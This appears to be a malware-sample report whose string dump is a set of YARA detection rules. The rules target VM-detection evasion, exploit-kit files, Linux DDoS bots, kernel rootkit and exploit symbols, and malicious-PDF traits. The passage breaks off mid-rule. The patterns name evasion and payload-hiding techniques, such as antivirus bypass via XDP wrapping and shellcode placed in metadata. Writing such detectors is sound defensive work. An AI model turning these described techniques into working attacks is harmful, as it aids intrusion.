Sample details: 27f54e0271e4f58b7d3c8ddc5c6d617f --

Hashes
MD5: 27f54e0271e4f58b7d3c8ddc5c6d617f
SHA1: 200ba1b0208a1fd4215b334fdea6e661105523c9
SHA256: e7bc1cd67b6d40cb5231bf1f5217475e84c52c5e684b3b9ce6378eebd9b2b1e0
SSDEEP: 12288:KFRRXPX+3hIyUyZFeRpTlrSszUgjN7wryCqhn8D4Oq2ugbpQgwGaNrId:KfR/XEhIyTeRzWszTKryCqjOugRaI
Details
File Type: data
Yara Hits (note: the Strings section below shows this sample is itself a text collection of YARA rules, so many of the hits listed here are likely those rules' own literal strings matching the named signatures, not evidence that the named families are present)
CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | CuckooSandbox/vmdetect | FlorianRoth/Empire_Get_SecurityPackages | FlorianRoth/Empire_Invoke_PowerDump | FlorianRoth/Empire_Invoke_ShellcodeMSIL | FlorianRoth/Empire_Invoke_SmbScanner | FlorianRoth/Empire_Invoke_EgressCheck | FlorianRoth/Empire_Invoke_PostExfil | FlorianRoth/Empire_Invoke_SMBAutoBrute | FlorianRoth/Empire_Get_Keystrokes | FlorianRoth/Empire_Invoke_DllInjection | FlorianRoth/Empire_KeePassConfig | FlorianRoth/Empire_PowerShell_Framework_Gen1 | FlorianRoth/Empire_PowerUp_Gen | FlorianRoth/Empire_PowerShell_Framework_Gen2 | FlorianRoth/Empire_KeePassConfig_Gen | FlorianRoth/Empire_Invoke_Portscan_Gen | FlorianRoth/Empire_Invoke_CredentialInjection_Invoke_Mimikatz_Gen | FlorianRoth/Empire_Invoke_Gen | FlorianRoth/Mal_http_EXE | FlorianRoth/Mal_PotPlayer_DLL | FlorianRoth/ScanBox_Malware_Generic | FlorianRoth/EQGRP_create_dns_injection | FlorianRoth/EQGRP_screamingplow | FlorianRoth/EQGRP_MixText | FlorianRoth/EQGRP_tunnel_state_reader | FlorianRoth/EQGRP_payload | FlorianRoth/EQGRP_eligiblecandidate | FlorianRoth/EQGRP_BUSURPER_2211_724 | FlorianRoth/EQGRP_networkProfiler_orderScans | FlorianRoth/EQGRP_epicbanana_2_1_0_1 | FlorianRoth/EQGRP_sniffer_xml2pcap | FlorianRoth/EQGRP_BananaAid | FlorianRoth/EQGRP_config_jp1_UA | FlorianRoth/EQGRP_userscript | FlorianRoth/EQGRP_BUSURPER_3001_724 | FlorianRoth/EQGRP_workit | FlorianRoth/EQGRP_tinyhttp_setup | FlorianRoth/EQGRP_EPBA | FlorianRoth/EQGRP_jetplow_SH | FlorianRoth/EQGRP_extrabacon | FlorianRoth/EQGRP_sploit_py | FlorianRoth/EQGRP_uninstallPBD | FlorianRoth/EQGRP_BICECREAM | FlorianRoth/EQGRP_BFLEA_2201 | FlorianRoth/EQGRP_StoreFc | FlorianRoth/EQGRP_BBALL | FlorianRoth/EQGRP_BARPUNCH_BPICKER | FlorianRoth/EQGRP_Implants_Gen5 | FlorianRoth/EQGRP_pandarock | FlorianRoth/EQGRP_BananaUsurper_writeJetPlow | FlorianRoth/EQGRP_Implants_Gen4 | FlorianRoth/EQGRP_Implants_Gen3 | FlorianRoth/EQGRP_BLIAR_BLIQUER | FlorianRoth/EQGRP_sploit | 
FlorianRoth/EQGRP_Implants_Gen2 | FlorianRoth/EQGRP_Implants_Gen1 | FlorianRoth/EQGRP_ssh_telnet_29 | FlorianRoth/EQGRP_callbacks | FlorianRoth/EQGRP_Extrabacon_Output | FlorianRoth/EQGRP_Unique_Strings | FlorianRoth/OPCLEAVER_BackDoorLogger | FlorianRoth/OPCLEAVER_Jasus | FlorianRoth/OPCLEAVER_ShellCreator2 | FlorianRoth/OPCLEAVER_SmartCopy2 | FlorianRoth/OPCLEAVER_TinyZBot | FlorianRoth/OPCLEAVER_ZhoupinExploitCrew | FlorianRoth/OPCLEAVER_antivirusdetector | FlorianRoth/OPCLEAVER_csext | FlorianRoth/OPCLEAVER_kagent | FlorianRoth/OPCLEAVER_mimikatzWrapper | FlorianRoth/OPCLEAVER_pvz_in | FlorianRoth/OPCLEAVER_zhLookUp | FlorianRoth/OPCLEAVER_zhmimikatz | FlorianRoth/OPCLEAVER_CCProxy_Config | FlorianRoth/RAT_Adzok | FlorianRoth/RAT_Ap0calypse | FlorianRoth/RAT_BlackShades | FlorianRoth/RAT_BlueBanana | FlorianRoth/RAT_Bozok | FlorianRoth/RAT_ClientMesh | FlorianRoth/RAT_DarkComet | FlorianRoth/RAT_DarkRAT | FlorianRoth/RAT_JavaDropper | FlorianRoth/RAT_LostDoor | FlorianRoth/RAT_NanoCore | FlorianRoth/RAT_Paradox | FlorianRoth/RAT_QRat | FlorianRoth/RAT_ShadowTech | FlorianRoth/RAT_Sub7Nation | FlorianRoth/RAT_Vertex | FlorianRoth/RAT_unrecom | FlorianRoth/Casper_Included_Strings | FlorianRoth/Casper_SystemInformation_Output | FlorianRoth/FVEY_ShadowBrokers_Jan17_Screen_Strings | FlorianRoth/OilRig_Malware_Campaign_Gen2 | FlorianRoth/Greenbug_Malware_4 | FlorianRoth/Greenbug_Malware_5 | FlorianRoth/EquationGroup_elgingamble | FlorianRoth/EquationGroup_cmsd | FlorianRoth/EquationGroup_ebbshave | FlorianRoth/EquationGroup_eggbasket | FlorianRoth/EquationGroup_sambal | FlorianRoth/EquationGroup_cmsex | FlorianRoth/EquationGroup_DUL | FlorianRoth/EquationGroup_slugger2 | FlorianRoth/EquationGroup_jackpop | FlorianRoth/EquationGroup_epoxyresin_v1_0_0 | FlorianRoth/EquationGroup_estesfox | FlorianRoth/EquationGroup__ftshell_ftshell_v3_10_3_0 | FlorianRoth/EquationGroup__scanner_scanner_v2_1_2 | FlorianRoth/EquationGroup__ghost_sparc_ghost_x86_3 | 
FlorianRoth/EquationGroup__jparsescan_parsescan_5 | FlorianRoth/EquationGroup__ftshell | FlorianRoth/EquationGroup_Toolset_Apr17_Eternalromance | FlorianRoth/EquationGroup_Toolset_Apr17_Gen2 | FlorianRoth/EquationGroup_Toolset_Apr17__DoubleFeatureReader_DoubleFeatureReader_0 | FlorianRoth/EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 | FlorianRoth/Regin_Related_Malware | FlorianRoth/Unit78020_Malware_Gen1 | FlorianRoth/Unit78020_Malware_Gen3 | FlorianRoth/APT_Liudoor | FlorianRoth/IronPanda_DNSTunClient | FlorianRoth/IronPanda_Malware_Htran | FlorianRoth/DeepPanda_lot1 | FlorianRoth/DeepPanda_htran_exe | FlorianRoth/GRIZZLY_STEPPE_Malware_2 | FlorianRoth/Sofacy_Fybis_ELF_Backdoor_Gen1 | FlorianRoth/PoseidonGroup_Malware | FlorianRoth/apt_equation_equationlaser_runtimeclasses | FlorianRoth/EquationDrug_HDDSSD_Op | FlorianRoth/Payload_Exe2Hex | FlorianRoth/WaterBug_wipbot_2013_dll | FlorianRoth/apt_hellsing_implantstrings | FlorianRoth/IMPLANT_3_v1 | FlorianRoth/BernhardPOS | FlorianRoth/FVEY_ShadowBroker_Auct_Dez16_Strings | FlorianRoth/Turla_APT_Malware_Gen1 | FlorianRoth/Turla_APT_Malware_Gen2 | FlorianRoth/Turla_APT_Malware_Gen3 | FlorianRoth/APT_Project_Sauron_Scripts | FlorianRoth/APT_Project_Sauron_arping_module | FlorianRoth/APT_Project_Sauron_kblogi_module | FlorianRoth/APT_Project_Sauron_basex_module | FlorianRoth/APT_Project_Sauron_dext_module | FlorianRoth/REDLEAVES_CoreImplant_UniqueStrings | FlorianRoth/PLUGX_RedLeaves | FlorianRoth/Invoke_mimikittenz | FlorianRoth/APT_Malware_PutterPanda_Rel | FlorianRoth/Codoso_CustomTCP_4 | FlorianRoth/Codoso_Gh0st_3 | FlorianRoth/Codoso_Gh0st_1 | FlorianRoth/Codoso_PGV_PVID_1 | FlorianRoth/shimrat | FlorianRoth/shimratreporter | FlorianRoth/WoolenGoldfish_Sample_1 | FlorianRoth/WoolenGoldfish_Generic_3 | FlorianRoth/Hacktool_Strings_p0wnedShell | FlorianRoth/Nanocore_RAT_Gen_1 | FlorianRoth/Nanocore_RAT_Gen_2 | FlorianRoth/apt_RU_MoonlightMaze_customlokitools | 
FlorianRoth/apt_RU_MoonlightMaze_customsniffer | FlorianRoth/apt_RU_MoonlightMaze_de_tool | FlorianRoth/apt_RU_MoonlightMaze_cle_tool | FlorianRoth/apt_RU_MoonlightMaze_xk_keylogger | FlorianRoth/Trojan_Win32_Plaplex | FlorianRoth/Trojan_Win32_Adupib | KevTheHermit/Paradox | KevTheHermit/Bozok | KevTheHermit/unrecom | KevTheHermit/DarkRAT | KevTheHermit/JavaDropper | KevTheHermit/LostDoor | KevTheHermit/BlackShades | KevTheHermit/Sub7Nation | KevTheHermit/BlueBanana | KevTheHermit/Crimson | KevTheHermit/NanoCore | KevTheHermit/DarkComet | KevTheHermit/Ap0calypse | KevTheHermit/Adzok | KevTheHermit/ShadowTech | KevTheHermit/Vertex | BAMFDetect/dexter_strings | BAMFDetect/BlackShadesServer | BAMFDetect/diamond_fox | BAMFDetect/backoff | BAMFDetect/DarkComet | BAMFDetect/alina | BAMFDetect/NanoCore | BAMFDetect/pony | BAMFDetect/easterjackpos | BAMFDetect/genome | BAMFDetect/Bozok | BAMFDetect/dendroid |
Strings
		// https://otx.alienvault.com/pulse/5977d20f481b4c736cf5f810
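rule WMI_VM_Detect : WMI_VM_Detect
{
    // Flags binaries that query the video adapter over WMI and also carry
    // a known virtual display adapter name: a common VM/sandbox evasion
    // check. Both a WQL query string AND an adapter name are required,
    // which keeps either set alone from firing on its own.
    meta:
        version = 2
        threat = "Using WMI to detect virtual machines via querying video card information"
        behaviour_class = "Evasion"
        author = "Joe Giron"
        date = "2015-09-25"
        description = "Detection of Virtual Appliances through the use of WMI for use of evasion."

    strings:
        // WQL queries against Win32_VideoController (ASCII and UTF-16LE, case-insensitive)
        $selstr  = "SELECT Description FROM Win32_VideoController" nocase ascii wide
        $selstr2 = "SELECT * FROM Win32_VideoController" nocase ascii wide

        // Display adapter names associated with virtualised guests
        $vm1 = "virtualbox graphics adapter" nocase ascii wide
        $vm2 = "vmware svga ii" nocase ascii wide
        $vm3 = "vm additions s3 trio32/64" nocase ascii wide
        // NOTE(review): "parallel" is a short, common substring ("parallel port",
        // "parallelism"); tolerable only because a $selstr* hit is also required.
        $vm4 = "parallel" nocase ascii wide
        $vm5 = "remotefx" nocase ascii wide
        $vm6 = "cirrus logic" nocase ascii wide
        $vm7 = "matrox" nocase ascii wide

    condition:
        any of ($selstr*) and any of ($vm*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile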
// https://otx.alienvault.com/pulse/5977d4dbf7cda57edf57bdbd
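rule bleedinglife2_adobe_2010_2884_exploit : EK
{
    // Auto-generated (YaraGenerator) string signature for a BleedingLife2
    // exploit-kit Flash component. The strings look like generic
    // ActionScript/Flash component identifiers, so precision rests on
    // requiring nearly all of them (17 of 18) rather than on any single one.
    meta:
        author = "Josh Berry"
        date = "2016-06-26"
        description = "BleedingLife2 Exploit Kit Detection"
        hash0 = "b22ac6bea520181947e7855cd317c9ac"
        sample_filetype = "unknown"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"

    strings:
        $string0 = "_autoRepeat"
        $string1 = "embedFonts"
        $string2 = "KeyboardEvent"
        $string3 = "instanceStyles"
        $string4 = "InvalidationType"
        $string5 = "autoRepeat"
        $string6 = "getScaleX"
        $string7 = "RadioButton_selectedDownIcon"
        $string8 = "configUI"
        $string9 = "deactivate"
        $string10 = "fl.controls:Button"
        $string11 = "_mouseStateLocked"
        $string12 = "fl.core.ComponentShim"
        $string13 = "toString"
        $string14 = "_group"
        $string15 = "addRadioButton"
        $string16 = "inCallLaterPhase"
        $string17 = "oldMouseState"

    condition:
        // NOTE(review): benign Flash files built from the same component set
        // may also contain most of these; confirm against a clean corpus.
        17 of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile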
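rule bleedinglife2_jar2 : EK
{
    // Auto-generated signature for a BleedingLife2 Java archive. Most
    // strings are ZIP/JAR member names; $string7, $string8 and $string9
    // appear to be fragments of compressed data adjacent to those names and
    // are brittle (any re-packing of the JAR changes them).
    meta:
        author = "Josh Berry"
        date = "2016-06-26"
        description = "BleedingLife2 Exploit Kit Detection"
        hash0 = "2bc0619f9a0c483f3fd6bce88148a7ab"
        sample_filetype = "unknown"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"

    strings:
        $string0 = "META-INF/MANIFEST.MFPK"
        $string1 = "RequiredJavaComponent.classPK"
        $string2 = "META-INF/JAVA.SFm"
        $string3 = "RequiredJavaComponent.class"
        $string4 = "META-INF/MANIFEST.MF"
        $string5 = "META-INF/JAVA.DSAPK"
        $string6 = "META-INF/JAVA.SFPK"
        $string7 = "5EVTwkx"
        $string8 = "META-INF/JAVA.DSA3hb"
        $string9 = "y\\Dw -"

    condition:
        9 of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile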
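rule bleedinglife2_adobe_2010_1297_exploit : EK PDF
{
    // Auto-generated signature for a BleedingLife2 Flash component
    // (tagged PDF by the author, though the strings are Flash-style
    // identifiers). Several entries are highly generic ("String",
    // "BOTTOM", "Scene 1"), so the near-all threshold is what carries
    // the precision.
    meta:
        author = "Josh Berry"
        date = "2016-06-26"
        description = "BleedingLife2 Exploit Kit Detection"
        hash0 = "8179a7f91965731daa16722bd95f0fcf"
        sample_filetype = "unknown"
        yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"

    strings:
        $string0 = "getSharedStyle"
        $string1 = "currentCount"
        $string2 = "String"
        $string3 = "setSelection"
        $string4 = "BOTTOM"
        $string5 = "classToInstancesDict"
        $string6 = "buttonDown"
        $string7 = "focusRect"
        $string8 = "pill11"
        $string9 = "TEXT_INPUT"
        $string10 = "restrict"
        $string11 = "defaultButtonEnabled"
        $string12 = "copyStylesToChild"
        $string13 = " xmlns:xmpMM"
        $string14 = "_editable"
        $string15 = "classToDefaultStylesDict"
        $string16 = "IMEConversionMode"
        $string17 = "Scene 1"

    condition:
        17 of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile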
// https://otx.alienvault.com/pulse/560c150e67db8c47d4ce2b14
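rule LinuxTsunami
{
    // Matches IRC-bot command/response strings used by the Linux Tsunami
    // (Kaiten) family. Any single string is enough; $a and $b are distinctive,
    // $c is a long fixed message.
    meta:
        Author      = "@benkow_"
        Date        = "2014/09/12"
        Description = "Strings inside"
        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"

    strings:
        $a = "PRIVMSG %s :[STD]Hitting %s"
        $b = "NOTICE %s :TSUNAMI <target> <secs>"
        $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."

    condition:
        // equivalent to "$a or $b or $c"
        any of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile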
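rule LinuxElknot
{
    // Matches two mangled C++ symbol names from the Elknot Linux DDoS
    // bot; both must be present. Symbol-name rules stop matching once a
    // build is stripped, so treat a miss as weak evidence only.
    meta:
        Author      = "@benkow_"
        Date        = "2013/12/24"
        Description = "Strings inside"
        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"

    strings:
        // CUtility::DeCrypt(char*, char const*) and CThreadAttack::Start(CCmdMessage*)
        $a = "ZN8CUtility7DeCryptEPciPKci"
        $b = "ZN13CThreadAttack5StartEP11CCmdMessage"

    condition:
        all of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile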
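rule exploit
{
    // Heuristic for Linux kernel privilege-escalation payloads: looks for
    // kernel symbol names typically resolved by such code. These names also
    // appear verbatim in kernel images, System.map/kallsyms dumps and
    // many kernel modules, so expect hits on benign kernel artefacts and
    // scope this rule to user-space binaries.
    meta:
        author="xorseed"
        reference= "https://stuff.rop.io/"

    strings:
        $xpl1 = "set_fs_root" nocase ascii wide
        $xpl2 = "set_fs_pwd" nocase ascii wide
        $xpl3 = "__virt_addr_valid" nocase ascii wide
        $xpl4 = "init_task" nocase ascii wide
        $xpl5 = "init_fs" nocase ascii wide
        $xpl6 = "bad_file_ops" nocase ascii wide
        $xpl7 = "bad_file_aio_read" nocase ascii wide
        $xpl8 = "security_ops" nocase ascii wide
        $xpl9 = "default_security_ops" nocase ascii wide
        $xpl10 = "audit_enabled" nocase ascii wide
        $xpl11 = "commit_creds" nocase ascii wide
        $xpl12 = "prepare_kernel_cred" nocase ascii wide
        $xpl13 = "ptmx_fops" nocase ascii wide
        $xpl14 = "node_states" nocase ascii wide

    condition:
        7 of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile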
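rule LinuxMrBlack
{
    // Matches the self-identifier and the version-report format string of
    // the Mr.Black Linux DDoS bot; both are required.
    meta:
        Author      = "@benkow_"
        Date        = "2014/09/12"
        Description = "Strings inside"
        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"

    strings:
        $a = "Mr.Black"
        $b = "VERS0NEX:%s|%d|%d|%s"   // note the digit zero in "VERS0NEX"

    condition:
        $a and $b
} // closing brace restored: absent from the extracted listing, required for the rule to compile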
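rule LinuxBillGates
{
    // Matches two mangled class names from the BillGates Linux DDoS bot;
    // both are required. Stripped builds will not carry these names.
    meta:
        Author      = "@benkow_"
        Date        = "2014/08/11"
        Description = "Strings inside"
        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429"

    strings:
        $a = "12CUpdateGates"
        $b = "11CUpdateBill"

    condition:
        $a and $b
} // closing brace restored: absent from the extracted listing, required for the rule to compile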
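rule rootkit
{
    // Heuristic for Linux kernel rootkits: looks for names of syscall
    // handlers and list/kobject helpers that such modules commonly hook
    // or unlink. Kernel images, System.map/kallsyms and ordinary kernel
    // modules carry these names too, so benign kernel artefacts will hit.
    // Fix: $sys29 read "sys_unlikat" (typo) and could never match; the
    // handler is sys_unlinkat.
    meta:
        author="xorseed"
        reference= "https://stuff.rop.io/"

    strings:
        $sys1 = "sys_write" nocase ascii wide
        $sys2 = "sys_getdents" nocase ascii wide
        $sys3 = "sys_getdents64" nocase ascii wide
        $sys4 = "sys_getpgid" nocase ascii wide
        $sys5 = "sys_getsid" nocase ascii wide
        $sys6 = "sys_setpgid" nocase ascii wide
        $sys7 = "sys_kill" nocase ascii wide
        $sys8 = "sys_tgkill" nocase ascii wide
        $sys9 = "sys_tkill" nocase ascii wide
        $sys10 = "sys_sched_setscheduler" nocase ascii wide
        $sys11 = "sys_sched_setparam" nocase ascii wide
        $sys12 = "sys_sched_getscheduler" nocase ascii wide
        $sys13 = "sys_sched_getparam" nocase ascii wide
        $sys14 = "sys_sched_setaffinity" nocase ascii wide
        $sys15 = "sys_sched_getaffinity" nocase ascii wide
        $sys16 = "sys_sched_rr_get_interval" nocase ascii wide
        $sys17 = "sys_wait4" nocase ascii wide
        $sys18 = "sys_waitid" nocase ascii wide
        $sys19 = "sys_rt_tgsigqueueinfo" nocase ascii wide
        $sys20 = "sys_rt_sigqueueinfo" nocase ascii wide
        $sys21 = "sys_prlimit64" nocase ascii wide
        $sys22 = "sys_ptrace" nocase ascii wide
        $sys23 = "sys_migrate_pages" nocase ascii wide
        $sys24 = "sys_move_pages" nocase ascii wide
        $sys25 = "sys_get_robust_list" nocase ascii wide
        $sys26 = "sys_perf_event_open" nocase ascii wide
        $sys27 = "sys_uname" nocase ascii wide
        $sys28 = "sys_unlink" nocase ascii wide
        $sys29 = "sys_unlinkat" nocase ascii wide   // was "sys_unlikat" (typo)
        $sys30 = "sys_rename" nocase ascii wide
        $sys31 = "sys_read" nocase ascii wide
        $sys32 = "kobject_del" nocase ascii wide
        $sys33 = "list_del_init" nocase ascii wide
        $sys34 = "inet_ioctl" nocase ascii wide

    condition:
        9 of them
} // closing brace restored: absent from the extracted listing, required for the rule to compile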
// https://otx.alienvault.com/pulse/59152852e159ed10ba8631ec
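rule invalid_XObject_js : PDF raw
{
    // Flags a PDF whose header claims a version below 1.4 (or has no
    // parseable version) yet uses both /XObject and /JavaScript: a
    // version/feature mismatch typical of hand-crafted malicious PDFs.
    // Fix: the original $ver only accepted "%PDF-1.[4-9]", so a PDF 2.x
    // header did not match and every PDF 2.x file using XObjects and
    // JavaScript fired this rule.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        description = "XObject's require v1.4+"
        ref = "https://blogs.adobe.com/ReferenceXObjects/"
        version = "0.1"
        weight = 2

    strings:
        $magic = { 25 50 44 46 }                 // "%PDF"
        $ver = /%PDF-(1\.[4-9]|2\.[0-9])/        // header versions where the combination is expected

        $attrib0 = /\/XObject/
        $attrib1 = /\/JavaScript/

    condition:
        // header may follow up to 1024 bytes of leading junk, as readers tolerate
        $magic in (0..1024) and not $ver and all of ($attrib*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile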
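rule suspicious_creator : PDF raw
{
    // Matches PDFs (header 1.3/1.4/1.6 only, as observed by the author)
    // whose metadata names one of three Creator values seen in malicious
    // samples. "Scribus" is also a legitimate desktop-publishing tool, so
    // $creator1 alone is a weak indicator; weight accordingly.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 3

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $header = /%PDF-1\.(3|4|6)/

        $creator0 = "yen vaw"
        $creator1 = "Scribus"
        $creator2 = "Viraciregavi"

    condition:
        $magic in (0..1024) and $header and 1 of ($creator*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile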
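rule XDP_embedded_PDF : PDF raw
{
    // Detects a PDF wrapped in an XDP (XML Data Package) envelope, a
    // known AV-bypass trick: all three XML markers must be present plus
    // either a raw "%PDF" header or its base64 form ("JVBERi0" encodes
    // "%PDF-").
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        ref = "http://blog.9bplus.com/av-bypass-for-malicious-pdfs-using-xdp"
        weight = 1

    strings:
        $s1 = "<pdf xmlns="
        $s2 = "<chunk>"
        $s3 = "</pdf>"
        $header0 = "%PDF"
        $header1 = "JVBERi0"

    condition:
        all of ($s*) and 1 of ($header*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile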
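rule multiple_filtering : PDF raw
{
    // Flags a /Filter entry that chains two or more of the listed decode
    // filters: multi-layer encoding is rarely needed legitimately and is
    // commonly used to hide exploit streams from scanners. The ".*" is
    // bounded to a single line since YARA's "." does not match newlines.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.2"
        weight = 3

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $attrib = /\/Filter.*(\/ASCIIHexDecode\W+|\/LZWDecode\W+|\/ASCII85Decode\W+|\/FlateDecode\W+|\/RunLengthDecode){2}/
        // left out: /CCITTFaxDecode, JBIG2Decode, DCTDecode, JPXDecode, Crypt

    condition:
        $magic in (0..1024) and $attrib
} // closing brace restored: absent from the extracted listing, required for the rule to compile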
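rule suspicious_author : PDF raw
{
    // Matches PDFs (header 1.3/1.4/1.6 only, as observed by the author)
    // carrying one of four Author metadata values seen in malicious
    // samples. Pure IoC strings: high precision, low coverage.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 4

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $header = /%PDF-1\.(3|4|6)/

        $author0 = "Ubzg1QUbzuzgUbRjvcUb14RjUb1"
        $author1 = "ser pes"
        $author2 = "Miekiemoes"
        $author3 = "Nsarkolke"

    condition:
        $magic in (0..1024) and $header and 1 of ($author*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile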
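rule suspicious_js : PDF raw
{
    // Flags a PDF that runs JavaScript on open (/OpenAction + /JavaScript)
    // and whose script uses at least two of the three constructs typical
    // of decoder stubs (eval, Array, String.fromCharCode). Note the
    // trailing space in $attrib0/$attrib1: they match only the
    // space-delimited dictionary form.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 3

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"

        $attrib0 = /\/OpenAction /
        $attrib1 = /\/JavaScript /

        $js0 = "eval"
        $js1 = "Array"
        $js2 = "String.fromCharCode"

    condition:
        $magic in (0..1024) and all of ($attrib*) and 2 of ($js*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile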
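rule suspicious_obfuscation : PDF raw
{
    // Flags heavy use of #xx hex escapes inside PDF names (e.g. "/J#61#76"),
    // a common way to hide keywords like /JavaScript from naive scanners.
    // More than five occurrences (#reg counts matches) are required so a
    // single escaped name does not trigger.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 2

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $reg = /\/\w#[a-zA-Z0-9]{2}#[a-zA-Z0-9]{2}/

    condition:
        $magic in (0..1024) and #reg > 5
} // closing brace restored: absent from the extracted listing, required for the rule to compile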
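rule PDF_Embedded_Exe : PDF
{
    // Flags a PDF that both embeds files (/EmbeddedFiles) and declares a
    // Windows /Launch action, the classic "open the attached executable"
    // construction. The hex patterns of the original are written as the
    // equivalent text strings for readability, and the header check is
    // widened from "at 0" to "in (0..1024)" to match the sibling PDF rules
    // (readers tolerate leading junk before "%PDF", which the strict
    // offset-0 check let through).
    meta:
        ref = "https://github.com/jacobsoo/Yara-Rules/blob/master/PDF_Embedded_Exe.yar"

    strings:
        $header = "%PDF"                                 // was { 25 50 44 46 }
        $Launch_Action = "<</S/Launch/Type/Action/Win<</F"   // was the equivalent hex string
        $exe = "<</EmbeddedFiles"                        // was the equivalent hex string

    condition:
        $header in (0..1024) and $Launch_Action and $exe
} // closing brace restored: absent from the extracted listing, required for the rule to compile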
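rule suspicious_creation : PDF raw
{
    // Matches PDFs (header 1.3/1.4/1.6 only, as observed by the author)
    // with one of two fixed CreationDate values seen in malicious samples.
    // The original used regexes with no metacharacters; plain strings are
    // equivalent and cheaper. Pure IoC strings: high precision, low coverage.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 2

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $header = /%PDF-1\.(3|4|6)/

        $create0 = "CreationDate (D:20101015142358)"
        $create1 = "CreationDate (2008312053854)"   // malformed date as found in samples

    condition:
        $magic in (0..1024) and $header and 1 of ($create*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile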
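rule shellcode_blob_metadata : PDF raw
{
    // Flags an unusually long alphanumeric run (200+ chars; 300+ for
    // /Creator, which legitimately tends to be longer) inside a PDF
    // metadata string field: such blobs have carried base64/encoded
    // shellcode that the document's script later decodes.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        description = "When there's a large Base64 blob inserted into metadata fields it often indicates shellcode to later be decoded"
        weight = 4

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"

        $reg_keyword = /\/Keywords.?\(([a-zA-Z0-9]{200,})/ //~6k was observed in BHEHv2 PDF exploits holding the shellcode
        $reg_author = /\/Author.?\(([a-zA-Z0-9]{200,})/
        $reg_title = /\/Title.?\(([a-zA-Z0-9]{200,})/
        $reg_producer = /\/Producer.?\(([a-zA-Z0-9]{200,})/
        $reg_creator = /\/Creator.?\(([a-zA-Z0-9]{300,})/
        $reg_create = /\/CreationDate.?\(([a-zA-Z0-9]{200,})/

    condition:
        $magic in (0..1024) and 1 of ($reg*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile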
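rule suspicious_producer : PDF raw
{
    // Matches PDFs (header 1.3/1.4/1.6 only, as observed by the author)
    // whose Producer is the Scribus PDF library or mentions Notepad.
    // Both producers also occur in benign documents, hence the low weight.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 2

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $header = /%PDF-1\.(3|4|6)/

        $producer0 = "Producer (Scribus PDF Library"   // equivalent to the original regex (no metacharacters)
        $producer1 = "Notepad"

    condition:
        $magic in (0..1024) and $header and 1 of ($producer*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile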
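rule suspicious_title : PDF raw
{
    // Matches PDFs (header 1.3/1.4/1.6 only, as observed by the author)
    // with one of three Title values seen in malicious samples. Pure IoC
    // strings: high precision, low coverage.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 4

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $header = /%PDF-1\.(3|4|6)/

        $title0 = "who cis"
        $title1 = "P66N7FF"
        $title2 = "Fohcirya"

    condition:
        $magic in (0..1024) and $header and 1 of ($title*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile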
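rule suspicious_launch_action : PDF raw
{
    // Flags a PDF combining at least three of the dictionary keys that
    // together describe an action launching an external file or URL
    // (/Launch, /URL, /Action, /OpenAction, /F). Note /Action and /F are
    // common in benign files; the three-of-five threshold is what limits noise.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        weight = 2

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"

        $attrib0 = /\/Launch/
        $attrib1 = /\/URL /
        $attrib2 = /\/Action/
        $attrib3 = /\/OpenAction/
        $attrib4 = /\/F /

    condition:
        $magic in (0..1024) and 3 of ($attrib*)
} // closing brace restored: absent from the extracted listing, required for the rule to compile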
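rule BlackHole_v2 : PDF raw
{
    // Matches a fixed cross-reference-stream /Index array seen in PDFs
    // produced by the BlackHole v2 exploit kit. A single literal IoC;
    // trivially changed by the kit author, so low coverage over time.
    meta:
        author = "Glenn Edwards (@hiddenillusion)"
        version = "0.1"
        ref = "http://fortknoxnetworks.blogspot.no/2012/10/blackhhole-exploit-kit-v-20-url-pattern.html"
        weight = 3

    strings:
        $magic = { 25 50 44 46 }            // "%PDF"
        $content = "Index[5 1 7 1 9 4 23 4 50"

    condition:
        $magic in (0..1024) and $content
} // closing brace restored: absent from the extracted listing, required for the rule to compile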
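rule suspicious_embed : PDF raw
{
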